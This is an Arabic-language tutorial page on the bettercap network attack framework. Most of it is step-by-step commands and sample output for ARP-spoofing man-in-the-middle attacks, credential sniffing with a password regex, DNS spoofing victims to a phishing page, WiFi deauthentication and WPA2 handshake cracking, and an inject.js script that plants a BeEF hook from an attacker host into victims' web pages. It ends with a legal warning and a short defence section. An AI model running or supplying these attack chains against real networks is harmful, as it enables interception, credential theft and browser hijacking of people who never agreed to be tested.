✦
✦
✦
✦
NETWORK ATTACK FRAMEWORK
bettercap
The Swiss Army Knife for Networks
الـ Framework الأكثر قوة ومرونة لهجمات الشبكات — MitM، WiFi، BLE، HID، وARP Spoofing في أداة واحدة مكتوبة بـ Go
🥷 RECON
›
SPOOF
›
SNIFF
›
INJECT
›
💀 PWNED
GoLANGUAGE
ALLPLATFORMS
WiFi+BLEWIRELESS
MitMSPECIALTY
// MISSION BRIEFING
- 01//ما هو Bettercap؟
- 02//التثبيت والتشغيل
- 03//الأوامر الأساسية
- 04//الـ Modules الكاملة
- 05//هجوم MitM — ARP Spoofing
- 06//الـ Sniffing وسرقة Credentials
- 07//DNS Spoofing
- 08//WiFi Attacks
- 09//HTTP Injection وBeEF Hook
- 10//Caplets — الأتمتة الكاملة
- 11//سيناريوهات هجوم حقيقية
- 12//الدفاع والحماية
// 01 — INTRODUCTION
Bettercap — الـ Swiss Army Knife
أقوى من Ettercap — مكتوب من الصفر بـ Go
Bettercap هو Framework مفتوح المصدر مكتوب بـ Go، يستهدف تقييم أمان الشبكات بشكل شامل. تم تطويره كبديل متقدم لـ Ettercap — أسرع وأستقر وأكثر ميزات. يعمل على Linux وmacOS وWindows وAndroid.
ما يجعله استثنائياً هو معماريته المعيارية — كل وظيفة هي Module منفصل يمكن تشغيله وإيقافه ديناميكياً. من ARP Spoofing وDNS Spoofing حتى WiFi Deauth وBluetooth BLE وMouseJacking — كل شيء في أداة واحدة.
يتفوق على Ettercap بـ: الاستقرار على شبكات كبيرة، واجهة تفاعلية قوية، دعم IPv6، وقابلية التوسيع عبر JavaScript Caplets.
⚠️ تحذير قانوني: استخدام Bettercap على شبكات لا تمتلك إذناً صريحاً باختبارها هو جريمة جنائية. استخدمه فقط على شبكاتك الخاصة أو في بيئات تدريبية مرخّصة.
// 02 — INSTALLATION
التثبيت والتشغيل
جاهز في دقيقة
// BETTERCAP — Install & Launch
# Kali Linux — مثبت مسبقاً أو
root@kali:~$ sudo apt update && sudo apt install bettercap -y
# من GitHub (أحدث إصدار)
root@kali:~$ go install github.com/bettercap/bettercap@latest
# Docker
root@kali:~$ docker pull bettercap/bettercap
root@kali:~$ docker run -it --privileged --net=host bettercap/bettercap
# تشغيل على Interface محدد
root@kali:~$ sudo bettercap -iface eth0
root@kali:~$ sudo bettercap -iface wlan0
# تشغيل مع Caplet مباشرة
root@kali:~$ sudo bettercap -iface eth0 -caplet http-req-dump.cap
# بعد التشغيل — Welcome Screen
bettercap v2.x (type 'help' for a list of commands)
192.168.1.0/24 > 192.168.1.5 »
// 03 — CORE COMMANDS
الأوامر الأساسية
كل ما تحتاجه في الـ Interactive Session
// BETTERCAP — Core Commands
## الأوامر العامة
» help # عرض كل الأوامر
» help arp.spoof # مساعدة Module محدد
» active # الـ Modules الشغالة حالياً
» quit # الخروج
» clear # تنظيف الشاشة
» sleep 5 # انتظار 5 ثوانٍ
## إدارة المتغيرات
» get * # عرض كل المتغيرات
» get arp.spoof.targets # قيمة متغير محدد
» set arp.spoof.targets 192.168.1.50
» set arp.spoof.fullduplex true
## تشغيل وإيقاف Modules
» net.probe on # اكتشاف الـ Hosts
» net.probe off
» arp.spoof on # بدء الـ Spoofing
» net.sniff on # بدء الـ Sniffing
## تشغيل Shell Command
» ! ifconfig # تنفيذ أمر Linux مباشرة
## إنشاء Alias للـ Target
» alias aa:bb:cc:dd:ee:ff victim
// 04 — MODULES
الـ Modules الكاملة
كل Module هو سلاح منفصل
// DISCOVERY
net.recon
يقرأ ARP Table ويكتشف الـ Hosts الجديدة تلقائياً مع Vendor Detection.
// DISCOVERY
net.probe
يرسل UDP Probes لكل IP في الـ Subnet لاكتشاف الأجهزة المخفية.
// ATTACK
arp.spoof
هجوم ARP Poisoning الكلاسيكي — يضع المهاجم وسط الاتصال. يدعم Full Duplex.
// ATTACK
dns.spoof
يُعيد توجيه DNS Queries لأي Domain لـ IP يحدده المهاجم.
// SNIFFING
net.sniff
يلتقط ويحلل الـ Packets — يستخرج Credentials من HTTP وFTP وSMTP وغيرها.
// PROXY
http.proxy
Proxy يعترض HTTP Traffic — يمكن تعديل الـ Requests والـ Responses بـ JS Scripts.
// PROXY
https.proxy
يعترض HTTPS بعد SSLStrip — يزيل التشفير ويقرأ البيانات المشفرة.
// WIFI
wifi.recon
مسح شبكات WiFi — اكتشاف APs والـ Clients المتصلة بكل شبكة.
// WIFI
wifi.deauth
إرسال Deauthentication Frames لفصل Clients عن الـ AP والتقاط WPA Handshake.
// BLUETOOTH
ble.recon
مسح أجهزة Bluetooth Low Energy — استعراض الـ Services والـ Characteristics.
// HID
hid
MouseJacking — اعتراض وحقن HID Frames على أجهزة Wireless Keyboard/Mouse.
// API
api.rest
REST API لإدارة Bettercap برمجياً — تحكم كامل عبر HTTP Requests.
// 05 — MITM / ARP SPOOFING
هجوم MitM — ARP Spoofing
الهجوم الأساسي — وضع نفسك وسط الاتصال
// ARP SPOOFING — Full Attack
## STEP 1: اكتشاف الـ Hosts
» net.probe on
[endpoint.new] 192.168.1.1 00:11:22:33:44:55 (Router)
[endpoint.new] 192.168.1.50 aa:bb:cc:dd:ee:ff (Windows PC)
[endpoint.new] 192.168.1.51 ff:ee:dd:cc:bb:aa (iPhone)
» net.probe off
## STEP 2: اختيار الـ Target
» set arp.spoof.targets 192.168.1.50
## STEP 3: تفعيل Full Duplex (الأقوى)
» set arp.spoof.fullduplex true
## STEP 4: بدء الهجوم
» arp.spoof on
[arp.spoof] ARP spoofer started, probing 1 targets.
[arp.spoof] Full duplex spoofing enabled.
## الآن أنت في المنتصف — كل Traffic يمر عبرك!
## STEP 5: بدء الـ Sniffing
» net.sniff on
## استهداف شبكة كاملة
» set arp.spoof.targets 192.168.1.0/24
» arp.spoof on
💡 Full Duplex: يهاجم الـ Target والـ Router في نفس الوقت — أكثر فعالية لكن أكثر ضجيجاً في الشبكة.
// 06 — SNIFFING
الـ Sniffing وسرقة Credentials
استخراج البيانات من الـ Traffic
// NET.SNIFF — Credential Capture
## تشغيل Sniff بسيط
» net.sniff on
## خيارات متقدمة
» set net.sniff.verbose false # إخفاء التفاصيل الكثيرة
» set net.sniff.local true # التقاط Traffic المحلي أيضاً
» set net.sniff.filter tcp port 80 # BPF Filter
» set net.sniff.regexp '.*password=.*' # Regex لاستخراج كلمات المرور
» set net.sniff.output capture.pcap # حفظ في ملف
## بروتوكولات يستخرج منها Credentials تلقائياً
[net.sniff] [http] POST http://site.com/login user=admin&pass=1234
[net.sniff] [ftp] USER: admin PASS: secretpass
[net.sniff] [smtp] AUTH LOGIN [email protected] password123
[net.sniff] [http] Authorization: Basic YWRtaW46cGFzc3dvcmQ=
# HTTP Basic = Base64 مفكوك تلقائياً!
// 07 — DNS SPOOFING
DNS Spoofing
توجيه الضحية لأي موقع تريده
// DNS SPOOFING — Redirect Attack
## توجيه Domain محدد لـ IP المهاجم
» set dns.spoof.domains facebook.com, google.com
» set dns.spoof.address 10.10.14.5
» dns.spoof on
[dns.spoof] DNS spoofer started for domains: facebook.com, google.com
## توجيه كل الـ Domains (*)
» set dns.spoof.domains *
» set dns.spoof.address 10.10.14.5
» dns.spoof on
## مثال: DNS + ARP + Phishing Page
# 1. شغّل HTTP Server على 10.10.14.5 مع Phishing Page
# 2. شغّل ARP Spoof على الضحية
# 3. شغّل DNS Spoof → الضحية تُوجَّه لصفحتك!
[dns.spoof] facebook.com → 10.10.14.5
// 08 — WIFI ATTACKS
WiFi Attacks
من الـ Deauth للـ Handshake Capture
// WIFI — Recon & Deauth & Handshake
## Enable Monitor Mode first
root@kali:~$ sudo bettercap -iface wlan0
## STEP 1: Scan Networks
» wifi.recon on
[wifi.recon] AP "HomeNetwork" ch:6 clients:3 WPA2
[wifi.recon] AP "CoffeeShop" ch:11 clients:8 WPA2
[wifi.recon] AP "OfficeLAN" ch:1 clients:15 WPA3
## STEP 2: Target specific channel
» set wifi.recon.channel 6
## STEP 3: Deauth to capture Handshake
» wifi.deauth AA:BB:CC:DD:EE:FF
[wifi.deauth] Sending deauth packets to AA:BB:CC:DD:EE:FF
[wifi.handshakes] WPA2 handshake captured for "HomeNetwork"!
[wifi.handshakes] Saved to /root/bettercap-wifi-handshakes.pcap
## STEP 4: Crack with Aircrack-ng
root@kali:~$ aircrack-ng -w wordlist.txt bettercap-wifi-handshakes.pcap
## PMKID Attack (no Deauth needed!)
» set wifi.assoc.skip.wpa3 true
» wifi.assoc AA:BB:CC:DD:EE:FF
[wifi.assoc] PMKID captured for "HomeNetwork"!
// 09 — HTTP INJECTION
HTTP Injection وBeEF Hook
حقن JavaScript في صفحات الضحية
// HTTP PROXY — JS Injection + BeEF
## حقن BeEF Hook في كل HTTP Response
» set http.proxy.injectjs http://10.10.14.5:3000/hook.js
» http.proxy on
» arp.spoof on
[http.proxy] Injecting hook.js in every HTTP response!
# كل موقع HTTP يزوره الضحية → يتضمن BeEF Hook تلقائياً!
## استخدام Script مخصص
» set http.proxy.script /path/to/inject.js
» http.proxy on
## inject.js — مثال
function onResponse(req, res) {
if(res.ContentType.includes('text/html')) {
var hook = '<script src="http://10.10.14.5:3000/hook.js"></script>';
res.Body = res.Body.replace('</body>', hook + '</body>');
}
}
## HTTPS — نحتاج hstshijack caplet
» include hstshijack/hstshijack
// 10 — CAPLETS
Caplets — الأتمتة الكاملة
Scripts جاهزة لأتمتة الهجمات
Caplets هي ملفات `.cap` تحتوي أوامر Bettercap بالتسلسل — تُنفَّذ تلقائياً عند التشغيل. مثل الـ Scripts لكن لـ Bettercap. يمكن تحميلها من bettercap/caplets على GitHub.
| الـ Caplet | الوظيفة |
|---|---|
| http-req-dump.cap | تفريغ كل HTTP Requests مع Credentials |
| mitm6.cap | هجوم MitM على IPv6 عبر DHCPv6 Spoofing |
| hstshijack.cap | تجاوز HSTS لاعتراض HTTPS Traffic |
| beef-active.cap | حقن BeEF Hook في كل HTTP Response |
| pita.cap | Pain In The Ass — هجوم شامل تلقائي |
| netmon.cap | مراقبة الشبكة وتسجيل كل النشاط |
| web-override.cap | استبدال صفحة ويب بأخرى مخصصة |
// CAPLET — مثال كامل
## ملف: my-mitm.cap
# events.stream off
net.probe on
sleep 2
net.probe off
set arp.spoof.targets 192.168.1.50
set arp.spoof.fullduplex true
set net.sniff.verbose false
set net.sniff.regexp '.*password.*'
arp.spoof on
net.sniff on
## تشغيل الـ Caplet
root@kali:~$ sudo bettercap -iface eth0 -caplet my-mitm.cap
## أو من داخل الـ Session
» include my-mitm.cap
// 11 — SCENARIOS
سيناريوهات هجوم حقيقية
من النظرية للتطبيق
01
// CREDENTIAL STEALING
سرقة كلمات مرور HTTP
ARP Spoof + net.sniff → كل كلمة مرور تُكتب على موقع HTTP تظهر مباشرة في Terminal المهاجم.
02
// PHISHING VIA DNS
Phishing عبر DNS Spoofing
ARP Spoof + DNS Spoof + HTTP Server بـ Phishing Page → الضحية تزور facebook.com فتُوجَّه لصفحتك الوهمية.
03
// BEEF HOOK INJECTION
Hook المتصفح عبر HTTP Injection
ARP Spoof + HTTP Proxy + injectjs → hook.js يُحقن في كل صفحة HTTP يزورها الضحية تلقائياً.
04
// WIFI HANDSHAKE
التقاط WPA2 Handshake
wifi.recon + wifi.deauth → الضحية تُفصل وعند إعادة الاتصال يُلتقط الـ Handshake لكسره بـ Aircrack-ng.
05
// NETWORK RECON
استطلاع شبكة كاملة
net.probe + net.recon → اكتشاف كل الأجهزة في الشبكة مع الـ MAC Address والـ Vendor تلقائياً.
// 12 — DEFENSE
الدفاع والحماية
كيف تحمي نفسك من Bettercap؟
// DEFENSE 01
HTTPS فقط
استخدم HTTPS دائماً — حتى مع MitM الـ Traffic مشفّر ولا يمكن قراءته.
// DEFENSE 02
VPN
الـ VPN يشفّر كل Traffic — حتى لو Bettercap يعترضه لن يستطيع قراءته.
// DEFENSE 03
Static ARP
تعيين ARP Entries ثابتة للـ Gateway يمنع ARP Spoofing كلياً.
// DEFENSE 04
ARP Monitoring
أدوات مثل XArp وArpwatch تكتشف ARP Spoofing وتُنبّه فوراً.
// DEFENSE 05
DNSSEC
DNSSEC يمنع DNS Spoofing بالتحقق من صحة الـ DNS Responses.
// DEFENSE 06
WPA3 + PMF
WPA3 مع Protected Management Frames يمنع Deauth Attacks على WiFi.
💡 الأهم: VPN + HTTPS يحميانك من 90% من هجمات Bettercap — حتى لو المهاجم في نفس الشبكة ونجح في ARP Spoofing.
Bettercap هو تطور حقيقي في عالم هجمات الشبكات — يجمع ما كان يتطلب عشر أدوات في أداة واحدة. فهمه لا يعني فقط تعلّم كيف يُهاجم، بل فهم عميق لكيفية عمل الشبكات وكيف يمكن الدفاع عنها. الاستخدام الأخلاقي والمرخّص هو المعيار الوحيد.